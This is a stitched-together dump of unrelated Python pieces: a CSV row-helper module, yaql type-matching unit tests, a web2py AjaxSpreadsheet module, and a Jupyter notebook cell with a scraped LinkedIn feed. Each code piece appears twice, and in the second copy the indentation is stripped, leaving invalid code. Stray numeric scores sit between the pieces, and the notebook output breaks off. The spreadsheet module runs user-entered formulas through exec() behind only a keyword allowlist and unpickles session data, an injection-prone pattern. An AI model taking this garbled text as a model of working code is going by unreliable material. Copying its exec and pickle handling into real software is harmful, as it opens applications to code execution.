        # above for any value with an embedded comma.
        with open(csvPath, 'a', newline='') as csvFile:
            csv.writer(csvFile).writerow(rowToAdd)
    return not alreadyExists
def DeleteRow(csvPath, rowToRemove):
    """Rewrite the CSV file, dropping every row equal to *rowToRemove*.

    :param csvPath: path of the CSV file to filter in place.
    :param rowToRemove: row (list of values) to remove from the file.
    """
    surviving = [row for row in ReadToList(csvPath) if row != rowToRemove]
    with open(csvPath, 'w', newline='') as csvOut:
        csv.writer(csvOut).writerows(surviving)
def _TestAddRow():
    """Manual smoke test: mutate row 1 of local.csv and try to re-add it."""
    rows = ReadToList('local.csv')
    candidate = rows[1]
    candidate[0] = 'ElBarfo'
    print('line added' if AddRow('local.csv', candidate) else 'line was already present')
    for row in ReadToList('local.csv'):
        print(row)
def _TestDeleteRow():
    """Manual smoke test: delete row 1 of local.csv and dump what remains."""
    DeleteRow('local.csv', ReadToList('local.csv')[1])
    for row in ReadToList('local.csv'):
        print(row)
if __name__ == "__main__":
    # Ad-hoc manual test entry point; operates on ./local.csv in the CWD.
    _TestDeleteRow()
# This code supports CSV (comma-separated values) text files like the csv library,
# but adds set-type operations AddRow() and DeleteRow()
# Each CSV file consists of a series of zero or more lines called rows.
# Each row is a comma-separated list of values.
# ReadToList() returns a list of row-elements, where each row-element is
# itself a list of the values in the corresponding row (line) of the file.
# AddRow() and DeleteRow() each take a row-element as their second argument.
import os, csv
# Read CSV file into a list of lists
def ReadToList(csvPath):
try:
with open(csvPath, 'r') as csvFile:
reader = csv.reader(csvFile)
return list(reader)
except:
print("The CSV could not be read.")
return []
def AddRow(csvPath, rowToAdd):
alreadyExists = False
if os.path.exists(csvPath):
try:
with open(csvPath, 'r') as csvFile:
for row in csv.reader(csvFile):
if row == rowToAdd:
alreadyExists = True
except:
print("The CSV could not be read.")
if not alreadyExists:
with open(csvPath, 'a') as csvFile:
csvFile.write(','.join(rowToAdd) + "\n")
return not alreadyExists
def DeleteRow(csvPath, rowToRemove):
csvList = ReadToList(csvPath)
with open(csvPath, 'w', newline='') as csvOut:
writer = csv.writer(csvOut)
for row in csvList:
if row != rowToRemove:
writer.writerow(row)
def _TestAddRow():
csvList = ReadToList('local.csv')
rowToAdd = csvList[1]
rowToAdd[0] = 'ElBarfo'
if AddRow('local.csv', rowToAdd):
print('line added')
else:
print('line was already present')
csvList = ReadToList('local.csv')
for line in csvList:
print(line)
def _TestDeleteRow():
csvList = ReadToList('local.csv')
rowToRemove = csvList[1]
DeleteRow('local.csv', rowToRemove)
csvList = ReadToList('local.csv')
for line in csvList:
print(line)
if __name__ == "__main__":
_TestDeleteRow() | 0.631253 | 0.508544 |
from yaql.language import exceptions
from yaql.language import specs
from yaql.language import yaqltypes
import yaql.tests
class TestMiscellaneous(yaql.tests.TestCase):
    def test_pass_lambda_from_code(self):
        # The 'where' function resolved from the context can be invoked
        # directly from Python with a constant or a native callable.
        self.assertEqual(
            [],
            list(self.context('where', self.engine, [1, 2, 3])(False)))
        self.assertEqual(
            [2, 3],
            list(self.context('where', self.engine, [1, 2, 3])(
                lambda item: item > 1)))

    def test_bool_is_not_an_integer(self):
        @specs.parameter('arg', yaqltypes.Integer())
        def foo(arg):
            return arg

        self.context.register_function(foo)
        # A plain int matches the Integer() parameter spec...
        self.assertEqual(2, self.eval('foo(2)'))
        # ...but a boolean must be rejected despite bool subclassing int.
        self.assertRaises(exceptions.NoMatchingFunctionException,
                          self.eval, 'foo(true)')

    def test_nullable_collections(self):
        # Each pair checks a collection type in its default (non-nullable)
        # flavor and with nullable=True; the function reports whether the
        # deserialized argument arrived as None.
        @specs.parameter('arg', yaqltypes.Sequence())
        def foo1(arg):
            return arg is None

        @specs.parameter('arg', yaqltypes.Sequence(nullable=True))
        def foo2(arg):
            return arg is None

        @specs.parameter('arg', yaqltypes.Iterable())
        def bar1(arg):
            return arg is None

        @specs.parameter('arg', yaqltypes.Iterable(nullable=True))
        def bar2(arg):
            return arg is None

        @specs.parameter('arg', yaqltypes.Iterator())
        def baz1(arg):
            return arg is None

        @specs.parameter('arg', yaqltypes.Iterator(nullable=True))
        def baz2(arg):
            return arg is None

        for checker in (foo1, foo2, bar1, bar2, baz1, baz2):
            self.context.register_function(checker)

        self.assertFalse(self.eval('foo1([1, 2])'))
        self.assertRaises(exceptions.NoMatchingFunctionException,
                          self.eval, 'foo1(null)')
        self.assertFalse(self.eval('foo2([1, 2])'))
        self.assertTrue(self.eval('foo2(null)'))
        self.assertFalse(self.eval('bar1([1, 2])'))
        self.assertRaises(exceptions.NoMatchingFunctionException,
                          self.eval, 'bar1(null)')
        self.assertFalse(self.eval('bar2([1, 2])'))
        self.assertTrue(self.eval('bar2(null)'))
        self.assertFalse(self.eval('baz1($)', data=iter([1, 2])))
        self.assertRaises(exceptions.NoMatchingFunctionException,
                          self.eval, 'baz1(null)')
        self.assertFalse(self.eval('baz2($)', data=iter([1, 2])))
        self.assertTrue(self.eval('baz2(null)'))
from yaql.language import exceptions
from yaql.language import specs
from yaql.language import yaqltypes
import yaql.tests
class TestMiscellaneous(yaql.tests.TestCase):
def test_pass_lambda_from_code(self):
self.assertEqual(
[],
list(self.context('where', self.engine, [1, 2, 3])(False))
)
self.assertEqual(
[2, 3],
list(self.context('where', self.engine, [1, 2, 3])(
lambda t: t > 1))
)
def test_bool_is_not_an_integer(self):
@specs.parameter('arg', yaqltypes.Integer())
def foo(arg):
return arg
self.context.register_function(foo)
self.assertEqual(2, self.eval('foo(2)'))
self.assertRaises(
exceptions.NoMatchingFunctionException,
self.eval, 'foo(true)')
def test_nullable_collections(self):
@specs.parameter('arg', yaqltypes.Sequence())
def foo1(arg):
return arg is None
@specs.parameter('arg', yaqltypes.Sequence(nullable=True))
def foo2(arg):
return arg is None
@specs.parameter('arg', yaqltypes.Iterable())
def bar1(arg):
return arg is None
@specs.parameter('arg', yaqltypes.Iterable(nullable=True))
def bar2(arg):
return arg is None
@specs.parameter('arg', yaqltypes.Iterator())
def baz1(arg):
return arg is None
@specs.parameter('arg', yaqltypes.Iterator(nullable=True))
def baz2(arg):
return arg is None
for func in (foo1, foo2, bar1, bar2, baz1, baz2):
self.context.register_function(func)
self.assertFalse(self.eval('foo1([1, 2])'))
self.assertRaises(
exceptions.NoMatchingFunctionException,
self.eval, 'foo1(null)')
self.assertFalse(self.eval('foo2([1, 2])'))
self.assertTrue(self.eval('foo2(null)'))
self.assertFalse(self.eval('bar1([1, 2])'))
self.assertRaises(
exceptions.NoMatchingFunctionException,
self.eval, 'bar1(null)')
self.assertFalse(self.eval('bar2([1, 2])'))
self.assertTrue(self.eval('bar2(null)'))
self.assertFalse(self.eval('baz1($)', data=iter([1, 2])))
self.assertRaises(
exceptions.NoMatchingFunctionException,
self.eval, 'baz1(null)')
self.assertFalse(self.eval('baz2($)', data=iter([1, 2])))
self.assertTrue(self.eval('baz2(null)')) | 0.602529 | 0.415314 |
import re
import pickle
import copy
def quote(text):
return str(text).replace('\\','\\\\').replace("'","\\'")
class Node:
"""
Example::
# controller
from gluon.contrib.spreadsheet import Sheet
def index():
if request.args:
sheet = Sheet.loads(session.psheet)
jquery=sheet.process(request)
session.psheet=sheet.dumps()
return jquery
else:
sheet=Sheet(10,10,URL(r=request))
#sheet = Sheet.loads(session.psheet)
sheet.cell('r0c3',value='=r0c0+r0c1+r0c2',readonly=True)
session.psheet = sheet.dumps()
return dict(sheet=sheet)
# view
{{extend 'layout.html'}}
<form>
<table spacing="0" border="0" padding="0">
{{for r in xrange(sheet.rows):}}
<tr>
{{for c in xrange(sheet.cols):}}
<td>
{{=XML(sheet.nodes['r%sc%s'%(r,c)].xml())}}
</td>
{{pass}}
</tr>
{{pass}}
</table>
</form>
"""
def __init__(self,name,value,url='.',readonly=False,active=True,onchange=None):
self.url=url
self.name=name
self.value=value
self.computed_value=''
self.incoming={}
self.outcoming={}
self.readonly=readonly
self.active=active
self.onchange=onchange
self.size=6
self.locked=False
def xml(self):
return """<input name="%s" id="%s" value="%s" size="%s"
onkeyup="ajax('%s/keyup',['%s'],':eval');"
onfocus="ajax('%s/focus',['%s'],':eval');"
onblur="ajax('%s/blur',['%s'],':eval');" %s/>
""" % (self.name,self.name,self.computed_value,self.size,
self.url,self.name,self.url,self.name,self.url,self.name,
(self.readonly and 'readonly ') or '')
def __repr__(self):
return '%s:%s' % (self.name,self.computed_value)
class Sheet:
regex=re.compile('(?<!\w)[a-zA-Z_]\w*')
re_strings = re.compile(r'(?P<name>'
+ r"[uU]?[rR]?'''([^']+|'{1,2}(?!'))*'''|"
+ r"'([^'\\]|\\.)*'|"
+ r'"""([^"]|"{1,2}(?!"))*"""|'
+ r'"([^"\\]|\\.)*")', re.DOTALL)
def dumps(self):
dump=pickle.dumps(self)
return dump
@staticmethod
def loads(data):
sheet=pickle.loads(data)
return sheet
def process(self,request):
"""
call this in action that creates table, it will handle ajax callbacks
"""
cell=request.vars.keys()[0]
if request.args(0)=='focus':
return "jQuery('#%s').val('%s');" % (cell,quote(self[cell].value))
value = request.vars[cell]
self[cell]=value
if request.args(0)=='blur':
return "jQuery('#%s').val('%s');" % (cell,quote(self[cell].computed_value))
elif request.args(0)=='keyup':
jquery=''
for other_key in self.modified:
if other_key!=cell:
jquery+="jQuery('#%s').val('%s');" % \
(other_key,quote(self[other_key].computed_value))
return jquery
def __init__(self,rows,cols,url='.'):
self.rows=rows
self.cols=cols
self.url=url
self.nodes={}
self.error='ERROR: %(error)s'
self.allowed_keywords=['for','in','if','else','and','or','not',
'i','j','k','x','y','z','sum']
self.environment={}
[self.cell('r%sc%s'%(k/cols,k%cols),'0.0') for k in xrange(rows*cols)]
exec('from math import *',{},self.environment)
def delete_from(self,other_list):
indices = [k for (k,node) in enumerate(other_list) if k==node]
if indices: del other_list[indices[0]]
def changed(self,node,changed_nodes=[]):
for other_node in node.outcoming:
if not other_node in changed_nodes:
changed_nodes.append(other_node)
self.changed(other_node,changed_nodes)
return changed_nodes
def define(self,name,obj):
self.environment[name]=obj
def cell(self,key,value,readonly=False,active=True,onchange=None):
"""
key is the name of the cell
value is the initial value of the cell. It can be a formula "=1+3"
a cell is active if it evaluates formuls
"""
if not self.regex.match(key): raise SyntaxError, "Invalid cell name"
node=Node(key,value,self.url,readonly,active,onchange)
self.nodes[key]=node
self[key]=value
def __setitem__(self,key,value):
node=self.nodes[key]
node.value=value
if value[:1]=='=' and node.active:
# clear all edges involving current node
for other_node in node.incoming:
del other_node.outcoming[node]
node.incoming.clear()
# build new edges
command = self.re_strings.sub("''",value[1:])
node.locked=False
for match in self.regex.finditer(command):
other_key=match.group()
if other_key==key:
self.computed_value=self.error % dict(error='cycle')
self.modified={}
break
if other_key in self.nodes:
other_node=self.nodes[other_key]
other_node.outcoming[node]=True
node.incoming[other_node]=True
elif not other_key in self.allowed_keywords and \
not other_key in self.environment:
node.locked=True
node.computed_value=self.error % dict(error='invalid keyword: '+other_key)
self.modified={}
break
self.compute(node)
else:
try:
node.computed_value=int(node.value)
except:
try:
node.computed_value=float(node.value)
except:
node.computed_value=node.value
self.environment[key]=node.computed_value
if node.onchange: node.onchange()
self.modified=self.iterate(node)
def compute(self,node):
if node.value[:1]=='=' and not node.locked:
try:
exec('__value__='+node.value[1:],{},self.environment)
node.computed_value=self.environment['__value__']
del self.environment['__value__']
except Exception,e:
node.computed_value=self.error % dict(error=str(e))
self.environment[node.name]=node.computed_value
if node.onchange: node.onchange()
def iterate(self,node):
output={node.name:node.computed_value}
changed_nodes = self.changed(node)
while changed_nodes:
ok=False
set_changed_nodes=set(changed_nodes)
for (k,other_node) in enumerate(changed_nodes):
#print other_node, changed_nodes
if not set(other_node.incoming.keys()).intersection(set_changed_nodes):
#print 'ok'
self.compute(other_node)
output[other_node.name]=other_node.computed_value
#print other_node
del changed_nodes[k]
ok=True
break
if not ok: return {}
return output
def __getitem__(self,key):
return self.nodes[key]
if __name__=='__main__':
s=Sheet(0,0)
s.cell('a',value="2")
s.cell('b',value="=sin(a)")
s.cell('c',value="=cos(a)**2+b*b")
print s['c'].computed_value | web2py-appliances-master/AjaxSpreadsheet/modules/sheet.py | import re
import pickle
import copy
def quote(text):
return str(text).replace('\\','\\\\').replace("'","\\'")
class Node:
"""
Example::
# controller
from gluon.contrib.spreadsheet import Sheet
def index():
if request.args:
sheet = Sheet.loads(session.psheet)
jquery=sheet.process(request)
session.psheet=sheet.dumps()
return jquery
else:
sheet=Sheet(10,10,URL(r=request))
#sheet = Sheet.loads(session.psheet)
sheet.cell('r0c3',value='=r0c0+r0c1+r0c2',readonly=True)
session.psheet = sheet.dumps()
return dict(sheet=sheet)
# view
{{extend 'layout.html'}}
<form>
<table spacing="0" border="0" padding="0">
{{for r in xrange(sheet.rows):}}
<tr>
{{for c in xrange(sheet.cols):}}
<td>
{{=XML(sheet.nodes['r%sc%s'%(r,c)].xml())}}
</td>
{{pass}}
</tr>
{{pass}}
</table>
</form>
"""
def __init__(self,name,value,url='.',readonly=False,active=True,onchange=None):
self.url=url
self.name=name
self.value=value
self.computed_value=''
self.incoming={}
self.outcoming={}
self.readonly=readonly
self.active=active
self.onchange=onchange
self.size=6
self.locked=False
def xml(self):
return """<input name="%s" id="%s" value="%s" size="%s"
onkeyup="ajax('%s/keyup',['%s'],':eval');"
onfocus="ajax('%s/focus',['%s'],':eval');"
onblur="ajax('%s/blur',['%s'],':eval');" %s/>
""" % (self.name,self.name,self.computed_value,self.size,
self.url,self.name,self.url,self.name,self.url,self.name,
(self.readonly and 'readonly ') or '')
def __repr__(self):
return '%s:%s' % (self.name,self.computed_value)
class Sheet:
regex=re.compile('(?<!\w)[a-zA-Z_]\w*')
re_strings = re.compile(r'(?P<name>'
+ r"[uU]?[rR]?'''([^']+|'{1,2}(?!'))*'''|"
+ r"'([^'\\]|\\.)*'|"
+ r'"""([^"]|"{1,2}(?!"))*"""|'
+ r'"([^"\\]|\\.)*")', re.DOTALL)
def dumps(self):
dump=pickle.dumps(self)
return dump
@staticmethod
def loads(data):
sheet=pickle.loads(data)
return sheet
def process(self,request):
"""
call this in action that creates table, it will handle ajax callbacks
"""
cell=request.vars.keys()[0]
if request.args(0)=='focus':
return "jQuery('#%s').val('%s');" % (cell,quote(self[cell].value))
value = request.vars[cell]
self[cell]=value
if request.args(0)=='blur':
return "jQuery('#%s').val('%s');" % (cell,quote(self[cell].computed_value))
elif request.args(0)=='keyup':
jquery=''
for other_key in self.modified:
if other_key!=cell:
jquery+="jQuery('#%s').val('%s');" % \
(other_key,quote(self[other_key].computed_value))
return jquery
def __init__(self,rows,cols,url='.'):
self.rows=rows
self.cols=cols
self.url=url
self.nodes={}
self.error='ERROR: %(error)s'
self.allowed_keywords=['for','in','if','else','and','or','not',
'i','j','k','x','y','z','sum']
self.environment={}
[self.cell('r%sc%s'%(k/cols,k%cols),'0.0') for k in xrange(rows*cols)]
exec('from math import *',{},self.environment)
def delete_from(self,other_list):
indices = [k for (k,node) in enumerate(other_list) if k==node]
if indices: del other_list[indices[0]]
def changed(self,node,changed_nodes=[]):
for other_node in node.outcoming:
if not other_node in changed_nodes:
changed_nodes.append(other_node)
self.changed(other_node,changed_nodes)
return changed_nodes
def define(self,name,obj):
self.environment[name]=obj
def cell(self,key,value,readonly=False,active=True,onchange=None):
"""
key is the name of the cell
value is the initial value of the cell. It can be a formula "=1+3"
a cell is active if it evaluates formuls
"""
if not self.regex.match(key): raise SyntaxError, "Invalid cell name"
node=Node(key,value,self.url,readonly,active,onchange)
self.nodes[key]=node
self[key]=value
def __setitem__(self,key,value):
node=self.nodes[key]
node.value=value
if value[:1]=='=' and node.active:
# clear all edges involving current node
for other_node in node.incoming:
del other_node.outcoming[node]
node.incoming.clear()
# build new edges
command = self.re_strings.sub("''",value[1:])
node.locked=False
for match in self.regex.finditer(command):
other_key=match.group()
if other_key==key:
self.computed_value=self.error % dict(error='cycle')
self.modified={}
break
if other_key in self.nodes:
other_node=self.nodes[other_key]
other_node.outcoming[node]=True
node.incoming[other_node]=True
elif not other_key in self.allowed_keywords and \
not other_key in self.environment:
node.locked=True
node.computed_value=self.error % dict(error='invalid keyword: '+other_key)
self.modified={}
break
self.compute(node)
else:
try:
node.computed_value=int(node.value)
except:
try:
node.computed_value=float(node.value)
except:
node.computed_value=node.value
self.environment[key]=node.computed_value
if node.onchange: node.onchange()
self.modified=self.iterate(node)
def compute(self,node):
if node.value[:1]=='=' and not node.locked:
try:
exec('__value__='+node.value[1:],{},self.environment)
node.computed_value=self.environment['__value__']
del self.environment['__value__']
except Exception,e:
node.computed_value=self.error % dict(error=str(e))
self.environment[node.name]=node.computed_value
if node.onchange: node.onchange()
def iterate(self,node):
output={node.name:node.computed_value}
changed_nodes = self.changed(node)
while changed_nodes:
ok=False
set_changed_nodes=set(changed_nodes)
for (k,other_node) in enumerate(changed_nodes):
#print other_node, changed_nodes
if not set(other_node.incoming.keys()).intersection(set_changed_nodes):
#print 'ok'
self.compute(other_node)
output[other_node.name]=other_node.computed_value
#print other_node
del changed_nodes[k]
ok=True
break
if not ok: return {}
return output
def __getitem__(self,key):
return self.nodes[key]
if __name__=='__main__':
s=Sheet(0,0)
s.cell('a',value="2")
s.cell('b',value="=sin(a)")
s.cell('c',value="=cos(a)**2+b*b")
print s['c'].computed_value | 0.291989 | 0.120879 |
{
"cells": [
{
"cell_type": "code",
"execution_count": 52,
"metadata": {},
"outputs": [],
"source": [
"import pandas as pd\n",
"import numpy as np\n",
"import re\n",
"import json"
]
},
{
"cell_type": "code",
"execution_count": 37,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"0 notifications total\n",
"\n",
"Skip to search\n",
"\n",
"Skip to main content\n",
"\n",
"Close jump menu\n",
"Search\n",
"Primary Navigation\n",
"Home\n",
"My Network\n",
"<EMAIL> \n",
"Messaging\n",
"13\n",
"13 new notifications\n",
"Notifications\n",
"<NAME>\n",
"Me\n",
"\n",
"Work\n",
"Advertise\n",
"Photo of <NAME>\n",
"<NAME>\n",
"Senior Data Engineer\n",
"\n",
"Who viewed your profile\n",
"238\n",
"Views of your post\n",
"567\n",
"Access exclusive tools & insights\n",
"Retry Premium Free\n",
" My items\n",
"\n",
"Fort Services logo\n",
"Fort Services\n",
"Page notifications\n",
"5\n",
"Page visitors\n",
"1\n",
"See visitor analytics\n",
"Recent\n",
"\n",
"CX Network: Customer Experience, Service, Insight, Digital and Marketing Leaders\n",
"Data Analytics - Big Data • BI • SQL • Power BI • Tableau • RPA • Python • ML • AI • Azure • DevOps\n",
"Oracle Retail Q&A\n",
"Oracle Retail Analytics Professional\n",
"Use it or Lose it: Data Science Best Practices to Leverage AI/ML\n",
"GroupsSee all Groups\n",
"\n",
"CX Network: Customer Experience, Service, Insight, Digital and Marketing Leaders\n",
"Data Analytics - Big Data • BI • SQL • Power BI • Tableau • RPA • Python • ML • AI • Azure • DevOps\n",
"Oracle Retail Q&AShow more Show more Groups\n",
"EventsSee all Events Contact: <EMAIL> \n",
"\n",
"\n",
"Havard Business School - Startup Demo DaySee allSee all Events\n",
"Followed HashtagsSee all Followed Hashtags\n",
"Discover more\n",
"Visit profile for Rabindra Kharel\n",
"\n",
"Start a post\n",
"\n",
"Photo\n",
"\n",
"Video\n",
"Event\n",
"\n",
"Write article\n",
"\n",
"Sort by:\n",
"Top\n",
"Feed Updates\n",
"Feed post number 1\n",
"kshitij’s profile photo\n",
"<NAME> commented on this\n",
"\n",
"Anup NepalStatus is reachable\n",
"Anup Nepal\n",
"• 1st\n",
"Digital Transformation\n",
"7h • 7 hours ago\n",
"I’m happy to share that I’m starting a new position as Retail Optimization Lead at Tango Energy!\n",
"\n",
"Starting a New Position\n",
"likecelebrate\n",
"27\n",
"<NAME> and 26 others\n",
"8 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"<NAME>\n",
"\n",
"\n",
"\n",
"Open Emoji Keyboard\n",
"\n",
"Current selected sort order is Most relevant\n",
"Most relevant\n",
"<EMAIL> \n",
" 1st degree connection1st\n",
"Software Engineer\n",
"2h\n",
"Congrats bro!\n",
"\n",
"\n",
"Like\n",
"\n",
"Reply\n",
"\n",
"Load more comments\n",
"Feed post number 2\n",
"<NAME> follows Hevo Data\n",
"\n",
"Hevo Data\n",
"Hevo Data\n",
"33,425 followers\n",
"Promoted\n",
"There is an easier way to perform Redshift ETL.\n",
"\n",
"Find out how you can save time on engineering and research to set-up Redshift ETL with our cheatsheet.\n",
"…see more\n",
"\n",
"Free guide to Redshift ETL\n",
"hevodata.com\n",
"\n",
"Download. View Sponsored Content\n",
"Download\n",
"like\n",
"40\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"\n",
"Be the first to comment on this\n",
"\n",
"Feed post number 3\n",
"Profile images for several LinkedIn members\n",
"Profile images for several LinkedIn membersProfile images for several LinkedIn members\n",
"<NAME> and <NAME> like this\n",
"\n",
"<NAME>Status is reachable\n",
"<NAME>\n",
"• 1st\n",
"Software Engineer\n",
"2d • 2 days ago\n",
"Just finished the course “Communicating with Confidence” by <NAME>! Check it out: https://lnkd.in/ejtCuJMK #publicspeaking #wellness.\n",
"\n",
"Certificate of Completion\n",
"linkedin.com • 1 min read\n",
"like\n",
"10\n",
"<NAME> and 9 others\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"\n",
"Be the first to comment on this\n",
"\n",
"Feed post number 1\n",
"Aayush AdhikariStatus is online\n",
"<NAME>\n",
"• 1st\n",
"Machine Learning Data Scientist at DeepMind Creations Pvt Ltd\n",
"8h • Edited • 8 hours ago\n",
"\n",
"Hello all our company is opening for PAID INTERNSHIP on Flutter. If you are interested plz send your CV at <EMAIL>\n",
"\n",
"#flutter\n",
"#flutterdeveloper\n",
"#ml\n",
"#ai\n",
"…see more\n",
"likesupport\n",
"12\n",
"1 comment\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 2\n",
"Jobs recommended for you\n",
"\n",
"View job: Senior Data Engineer\n",
"\n",
"Recruiting from Scratch\n",
"Senior Data Engineer\n",
"Recruiting from Scratch\n",
"Vancouver, British Columbia, Canada\n",
"\n",
"1 month ago\n",
"View job: Senior Data Engineer - Scala/AWS\n",
"\n",
"Jobot\n",
"Senior Data Engineer - Scala/AWS\n",
"Jobot\n",
"Vancouver, British Columbia, Canada\n",
"\n",
"1 week ago • Easy Apply\n",
"View job: Senior Big Data Engineer\n",
"\n",
"Emonics LLC\n",
"Senior Big Data Engineer\n",
"Emonics LLC\n",
"Vancouver, British Columbia, Canada\n",
"send email to <EMAIL> \n",
"\n",
"3 days ago • Easy Apply\n",
"\n",
"See moreSee more\n",
"Feed post number 3\n",
"Santosh’s profile photo\n",
"Santosh Pandey likes this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 3rd+\n",
"☀️ Solving for Future of Work | People Engagement\n",
"3d • 3 days ago\n",
"Follow\n",
"Hypocrisy 101\n",
"\n",
"\"How soon can you join? We need somebody who can join within a week.\"\n",
"\n",
"\"You'll need to serve 3 months of notice period, we can't do anything about it.\"\n",
"\n",
"If the employee is so important to you that you need 3 months to replace them, you should've treated them well in the first place - and they probably wouldn't have left.\n",
"\n",
"A smooth exit process is underrated.\n",
"\n",
"Do it well, and the employee might consider returning in the future.\n",
"\n",
"Make it complicated, and the employee will ensure that none of their friends/acquaintances ends up joining your company ever again. 🙃\n",
"\n",
"Curious, how was your exit process in your previous org?\n",
"\n",
"#noticeperiod #offboarding #employeeexperience\n",
"…see more\n",
"\n",
"No alternative text description for this imageActivate to view larger image\n",
"likecelebratesupport agent <EMAIL> \n",
"1,420\n",
"<NAME> and 1,419 others\n",
"87 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 4\n",
"<NAME>, <NAME> and 136 other connections follow The British College, Kathmandu\n",
"\n",
"The British College, Kathmandu\n",
"The British College, Kathmandu\n",
"4,662 followers\n",
"Promoted\n",
"TBC is proud to announce the second series of the TBC Distinguished Guest Lecture Series with Prof <NAME> & Dr <NAME>. The topic of the session: \"Innovation, Development & Covid 19: Post Pandemic Context for Nepal.\"\n",
"RSVP: https://bit.ly/33jYiV1\n",
"…see more\n",
"No alternative text description for this image\n",
"TBC Distinguished Guest Lecture Series II\n",
"Apply Now. View Sponsored Content\n",
"Apply Now\n",
"No alternative text description for this image\n",
"TBC Distinguished Guest Lecture Series II\n",
"Apply Now. View Sponsored Content\n",
"Apply Now\n",
"No alternative text description for this image\n",
"TBC Distinguished Guest Lecture Series II\n",
"Apply Now. View Sponsored Content\n",
"Apply Now\n",
"\n",
"like\n",
"25\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"\n",
"Be the first to comment on this\n",
"\n",
"Feed post number 5\n",
"Congratulate <NAME> on their work anniversary\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 1st\n",
"CEO and Founder at SoftNEP\n",
"1d1 day ago\n",
"Celebrating 17 years at SoftNEP Pvt Ltd\n",
"celebratelike\n",
"2\n",
"\n",
"Congrats Sunil\n",
"\n",
"Time flies!\n",
"\n",
"Kudos to you\n",
"\n",
"Wow!\n",
"\n",
"What an achievement!\n",
"\n",
"Great work!\n",
"\n",
"Wow, 17 years already?\n",
"\n",
"Scroll right\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"<NAME>\n",
"\n",
"\n",
"\n",
"Open Emoji Keyboard\n",
"\n",
"Feed post number 6\n",
"Lekhanath’s profile photo\n",
"<NAME> commented on this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 3rd+\n",
"Director, Eurest\n",
"3d • 3 days ago\n",
"I am looking to fill the following jobs:\n",
"<NAME>\n",
"<NAME>\n",
"Prep Cook\n",
"\n",
"Monday-Friday\n",
"<NAME>\n",
"PM me for details\n",
"…see more\n",
"likelove\n",
"166\n",
"132 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"<NAME>\n",
"\n",
"\n",
"\n",
"Open Emoji Keyboard\n",
"\n",
"Current selected sort order is Most relevant\n",
"Most relevant\n",
"See profile for Lekhanath BhandariStatus is reachable\n",
"<NAME>\n",
" 1st degree connection1st\n",
"sous chef at fazlani nature nest\n",
"1d\n",
"Interested for sous chef\n",
"\n",
"\n",
"Like\n",
"\n",
"Reply\n",
"\n",
"Load more comments\n",
"Feed post number 7\n",
"Bibek’s profile photo\n",
"<NAME> likes this\n",
"\n",
"<NAME>Status is reachable\n",
"<NAME>\n",
"• 2nd\n",
"CEO, Innovation and Growth at Trinity Consulting - Founder, InfluencerActive, the World's First B2B Influencer Marketplace\n",
"12h • 12 hours ago\n",
"Follow\n",
"Turn your plants into pets!\n",
"\n",
"Play\n",
"Back to start of video\n",
"Skip back 10 seconds\n",
"Skip ahead 10 seconds\n",
"Current time 0:00/Duration 0:45\n",
" \n",
"1x\n",
"\n",
"Playback speed\n",
"\n",
"Unmute\n",
"\n",
"Turn fullscreen on\n",
"likeloveinsightful\n",
"9,044\n",
"<NAME> and 9,043 others\n",
"257 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 1\n",
"Larange’s profile photo\n",
"<NAME> likes this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 2nd\n",
"Research Scientist at Google DeepMind • Advisor at AlphaSignal.ai\n",
"1d • Edited • 1 day ago\n",
"Follow\n",
"Hi all!\n",
"We're currently looking for a part time (4 hours/week) Computer Science PhD or Masters student to help us at https://alphasignal.ai\n",
"\n",
"A few criteria:\n",
"-Must be between timezones GMT+5 (India) to GMT+9 (Japan).\n",
"-Published at least one research paper in Machine Learning.\n",
"-Has some familiarity with Pytorch, Tensorflow.\n",
"-Knows the difference between RNN, CNN, LSTM, GANs.\n",
"-Familiarity with Deep Learning terms.\n",
"-Knows about Meta AI, Deepmind, Google AI, OpenAI and other big players.\n",
"\n",
"That's it!\n",
"If you know a student who fits the role send it my way :)\n",
"\n",
"It's definitely a resume-booster.\n",
"…see more\n",
"likesupportcurious\n",
"432\n",
"<NAME> and 431 others\n",
"102 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 2\n",
"<NAME> and <NAME> follow Spot by NetApp\n",
"\n",
"Spot by NetApp\n",
"Spot by NetApp\n",
"11,440 followers\n",
"Promoted\n",
"Download our free digital guide to Microsoft Azure. Learn best practices for architecting and managing efficient, scalable cloud infrastructure built to accelerate your business\n",
"…see more\n",
"\n",
"Getting Started with Azure Cloud Infrastructure – Get the PDF Guide\n",
"get.spot.io\n",
"\n",
"Download. View Sponsored Content\n",
"Download\n",
"like\n",
"30\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"\n",
"Be the first to comment on this\n",
"\n",
"Feed post number 3\n",
"Everest’s profile photo\n",
"Everest K.C. likes this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 2nd\n",
"System Administrator\n",
"6h • Edited • 6 hours ago\n",
"<NAME> is an extremely experienced DevOps engineer. He has an intelligent teaching method, Start teaching from the very basics to taking to a stage where you build real-world solutions and debug challenges. The designed labs were great and worked as expected without a hitch. Thanks, owlocular to give me this certificate.\n",
"…see more\n",
"Your document has finished loading\n",
"likecelebratelove\n",
"6\n",
"Everest K.C. and 5 others\n",
"1 comment\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 4\n",
"Lalit’s profile photo\n",
